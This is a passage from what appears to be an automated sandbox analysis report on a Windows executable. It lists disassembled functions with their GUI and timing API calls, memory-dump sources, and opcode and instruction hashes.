                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                                                                                                            Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 659298297-0
                                                                                                                                                                                                                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                                                                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                                                                                                                            Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                                                                                                              • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 142311417-0
                                                                                                                                                                                                                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                                                                                                                            Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                                                                                                            Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3087257052-0
                                                                                                                                                                                                                                                            • Opcode ID: f62ed41ea241afa131cc03573afa6ce8baa014cb5768656ceaed1311313165be
                                                                                                                                                                                                                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f62ed41ea241afa131cc03573afa6ce8baa014cb5768656ceaed1311313165be
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                                                                                                                                            Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2338827641-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                                                                                                                            Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                                                                                                                            Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                                                                                                                            Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4023252218-0
                                                                                                                                                                                                                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                                                                                                                                            Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1489400265-0
                                                                                                                                                                                                                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                                                                                                                            Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1042038666-0
                                                                                                                                                                                                                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                                                                                                                            Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
